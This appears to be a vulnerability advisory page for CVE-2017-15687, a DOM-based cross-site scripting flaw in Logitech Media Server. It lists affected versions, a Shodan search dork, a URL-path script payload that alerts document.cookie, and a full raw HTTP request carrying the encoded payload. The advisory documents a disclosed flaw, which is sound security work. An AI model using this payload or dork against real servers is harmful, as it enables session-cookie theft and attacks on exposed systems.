Logitech Media Server Cross-Site Scripting

2017.10.24
Credit: Thiago "THX" Sena
Risk: Low
Local: No
Remote: Yes
CVE: CVE-2017-15687
CWE: CWE-79
Dork: Logitech Media Server


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

# Exploit Title: DOM Based Cross Site Scripting (XSS) - Logitech Media Server # Shodan Dork: Logitech Media Server # Date: 14/10/2017 # Exploit Author: Thiago "THX" Sena # Vendor Homepage: https://www.logitech.com # Tested on: windows 10 # CVE : CVE-2017-15687 ----------------------------------------------- PoC: - First you go to ( http://IP:PORT/ ) - Then put the script ( <BODY ONLOAD=alert(document.cookie)> ) - ( http://IP:PORT/<BODY ONLOAD=alert(document.cookie)> ) - Xss Vulnerability --------------------------------------------------- [Versões Afetadas] 7.7.3 7.7.5 7.9.1 7.7.2 7.7.1 7.7.6 7.9.0 [Request] GET /%3Cbody%20onload=alert('Xss')%3E HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Cookie: Squeezebox-expandPlayerControl=true; Squeezebox-expanded-MY_MUSIC=0; Squeezebox-expanded-RADIO=0; Squeezebox-expanded-PLUGIN_MY_APPS_MODULE_NAME=0; Squeezebox-expanded-FAVORITES=0; Squeezebox-expanded-PLUGINS=0 Connection: close Upgrade-Insecure-Requests: 1


See this note in RAW Version
Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top